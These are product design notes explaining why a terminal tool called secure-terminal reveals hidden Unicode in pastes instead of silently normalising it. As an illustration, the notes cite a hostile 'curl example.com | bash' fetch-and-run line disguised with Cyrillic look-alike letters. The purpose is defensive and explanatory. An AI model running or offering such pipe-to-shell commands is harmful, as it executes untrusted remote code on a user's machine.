DESIGN NOTES

We reveal what crosses. We never quietly rewrite it.

secure-terminal holds any risky paste or copy and shows you every hidden byte - but it never silently "cleans" the text on your behalf. That restraint is deliberate, not a missing feature. A cleaner that rewrites what crosses the boundary can turn text that was harmless into text that runs, and can corrupt what you trusted without leaving a trace. Here is why marking beats mending.

The shortcut we refused

The obvious feature is a silent auto-clean: on every paste, strip the invisible characters, fold the look-alikes back to plain ASCII, and hand over the "safe" result with no prompt. It sounds like pure convenience.

It is a footgun, and it fires in two directions. "Sanitize it for me" and "leave the bytes exactly as they are" are opposite goals: the first makes text look normal, the second keeps it honest. A tool cannot silently do the first without sometimes betraying the second - and the two cases below show what that betrayal costs.

When rewriting arms the trap

Hostile text is often dangerous-looking yet inert - and it is inert because it is malformed. The very bytes that make a payload look wrong to the machine are the bytes that stop it running.

Take the hostile curl | bash line from the review bar - the one whose example and bash hide Cyrillic look-alikes. As pasted, the shell cannot resolve those words: the command errors out, nothing is fetched, nothing runs. The look-alike letter is the safety.

Now "helpfully" auto-fold it. Mapping each Cyrillic character back to its ASCII twin rebuilds a working curl example.com | bash and drops it straight at your prompt. The single transformation a cleaner would proudly call a fix is the only thing that makes the trap live. Revealing the byte does the opposite: it tells you "this letter is not the one it is pretending to be", and leaves the decision with you.

When rewriting corrupts what you trusted

The other direction needs no attacker at all. Plenty of ordinary text you copy carries non-ASCII on purpose, and much of it you cannot check by eye.

Copy a password, an API key or a recovery phrase from a password manager or a documentation page. Real ones contain typographic dashes, accented letters, or a non-breaking space a web form quietly inserted. You cannot proof-read a secret by looking at it. A silent auto-fold delivers a different string that appears identical - so you lock yourself out, or worse, save a corrupted credential you will never trace back to the paste that mangled it.

For anything you cannot re-read - a secret, a signature, an exact path - a silent rewrite is both undetectable and irreversible. Nothing malicious happened. The bytes were fine; the "cleaner" is what broke them.

What we do instead

Surface the bytes; let the human decide. The boundary review opens fully revealed - every hidden character named in place, nothing pre-dropped - and holds the text until you choose. What you see is exactly what will cross.

The transforms still exist: Strip unicode, ASCII-fold and Keep printable unicode are one click away. The difference is who pulls the trigger. You apply a transform after you have seen what is there - the terminal never applies one behind your back, before you have looked. We offer to fold it; we never fold it for you.

See the mechanism on the review bar page, and the attack classes it addresses on the attacks page.

The one way to turn review off

And an honest note about the exception. You can silence the review bar - but even switched off, secure-terminal still does not silently mangle your text.

With paste_warn=never or copy_warn=never, real unicode crosses unreviewed so you can paste it deliberately - and a risk lamp still marks the crossing, so it is never invisible. The default (unicode) reviews anything non-ASCII, and any multi-line paste, before it can reach the shell. In no mode does secure-terminal quietly rewrite what you copy or paste: it either shows you, or it gets out of the way - it never pretends.